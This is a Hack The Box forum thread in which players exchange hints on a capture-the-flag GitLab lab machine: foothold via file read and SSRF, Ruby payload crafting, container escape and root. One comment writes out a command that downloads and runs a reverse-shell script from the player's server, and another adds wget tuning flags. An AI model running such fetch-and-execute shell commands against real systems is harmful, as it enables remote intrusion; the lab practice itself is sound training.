Official Laboratory Discussion

13468918

Comments

  • Rooted!
    Definitely not an easy box. As usual foothold is harder than user and root. 502 error is for sure annoying and distracting.

    Set up your own environment and it doesnt have to be via docker. Just simple standalone VM.
    Big thanks to @PrivacyMonk3y

    ruskii

  • Having trouble creating the payload.. I can create files and modify them just fine but can't reverse

  • Type your comment> @alphaomega said:

    Having trouble creating the payload.. I can create files and modify them just fine but can't reverse

    Think about what's going on when you're doing the other files.
    Break that process done. Can you use the same method it's using?

    The poc is using pipes... that's interesting isn't it?

  • Type your comment> @PrivacyMonk3y said:

    Type your comment> @alphaomega said:

    Having trouble creating the payload.. I can create files and modify them just fine but can't reverse

    Think about what's going on when you're doing the other files.
    Break that process done. Can you use the same method it's using?

    The poc is using pipes... that's interesting isn't it?

    I managed to finally get the g*t user. Not sure what poc is!

  • Felt like I was on the verge of getting RCE but got so stuck I tried resetting the machine as a last resort, and now only 502 errors like others have mentioned. Is there a trick to getting around those?

  • Switched VPNs and I'm back in business. Although it doesn't fix it for anyone on that original VPN.

  • edited November 2020

    I can get some file exfiltration, but not much more. Do I need to set up a local G***** instance and poke around it to see what files to take or is that a time waste? Cheers.

    EDIT: afaik I can only grab files that the g*****-w** user has perms to view (or one of the g*****-xxxxx users)

  • Type your comment> @andrenl said:

    Got a foothold and landed on a limited D****r C*********.
    Any nudges on how to get user?

    Hint:

    Google basic commands research on G****-r**** C******.
    You should think what to do with D *****
    if you need something PM

  • Spoiler Removed

  • Hi Guys, There must be another trick than using R**** C******.

  • Type your comment> @mohsinhakak said:

    Whoops, GitLab is taking too much time to respond. been like this for days, any information on how to get rid of this please PM , thanks

    Same here, it worked great for me before

  • edited November 2020

    Hnmm I leaked the secret, but I can't get r*** to run my payload. I tried adding spaces to remove ='s as 0xc45 suggested but still no luck. Any tips?

  • Stuck on the foothold. I’ve found the g** URL and made an account. Can create a project and get it to call a r****r on my local g***** instance, but haven’t found a way to turn this into anything yet. Searched for CVEs but haven’t found any that are useful. As usual I may have missed something obvious?
  • Rooted :wink:

    That was an easy box?
    I don't think so...
    Thanks, @n3ph0s for the nudge on foothold.

    Feel free to PM if any help is needed.

  • guys im stuck in the beginning can someone dm me a hint to start with, i did a service scan and i can't get anywhere around the website

  • Rooted!

    why am i so distracted and overlook things???
    Contrary to everyone, the user was easier than the root !

    Might be luck but, things just went the right path (even not using docker prior to this)...

    foot:

    • look carefully (enumeration)
    • Some things (do.. cof... mains) are just a pot full of honey...
    • find the version and build piece by piece with that (find that POC)
    • When exploiting, if the payload fails, check what was said about the "=" symbols (i did not had that issue tho)
    • remember what was, also, said, the machine might not have the bins you want/need

    user:

    • It was already mentioned (if you cant crack/find, just hammer the guts and reset the machine!)

    root:

    • Enum (latest) might help you over Peas on this one
    • when the spicy thing is found, if you look closely, you just need the initial procedures of RE to see it

    If nudges needed, honk the horn on pm

  • edited November 2020

    Thought I'd have a nice little time on this box, but it seems to be 502'ing everything for me after stops/starts/resets :(

    Edit: I had to change servers for it to work.

    Hack The Box

  • Actually got a shell but no idea about how to find the user flag.

    Please send me some nudges.

  • edited November 2020

    I've reached the gi**ab page, registered an account, discovered the L_I, but can't undestand how to get R_E, i've read about ss*f but it says import url is blocked, am i on the right path? i'm blocked ..

  • Spoiler Removed

  • This box made me sweat, there are still some mysteries that I have not solved, why some payload works for one person is not the other ...

    I spent a lot of time setting up the env

    it is not an easy box for me

    if you need help PM

    SpawnZii

  • Yikes, this is not an easy box for me.

    I thought I had some plain ruby working for generating the payload, but it's just not accepted. The 'other' more convoluted doc*** route has also failed to generate a payload which works.

  • edited November 2020

    Hint for those struggling with a foothold: If you get a "Something went wrong" error, try a different bin

    cmoon
    OSCP

  • What i suggest for those with payload problems is: Download a shell script from your local python http.server to perform the reverse shell, special symbols may cause problems

    this approach got me good: wget "yourserver/rev.sh" && chmod +x rev.sh && ./rev.sh

    trying the bash rev shell directly did not worked for me and the one i said above was reliable all the times (used it like 6 times due to resets and stuff)

  • Having zero luck getting the payload to hit a local web server. This one has bested me.

  • Type your comment> @trcm said:

    Having zero luck getting the payload to hit a local web server. This one has bested me.

    how you generating it??

  • edited November 2020

    I tried step by step with the h_c_eron_ page, and I also tried crafting a standalone ruby script.

  • Ahha, progress. I had to add "--timeout=3 --tries=1" as wget wasn't reaching my web service and was executing in place on the rails console borking the erb instance it seems.

  • rooted. the hardest part was finding the foothold. thanks @siurana for the nudge. after finding an article with the right path, the rest was straightforward. thanks @0xc45 for a fun box!
  • alright i think i know the vulnerability but can someone help me with how to exploit it

    image

Sign In to comment.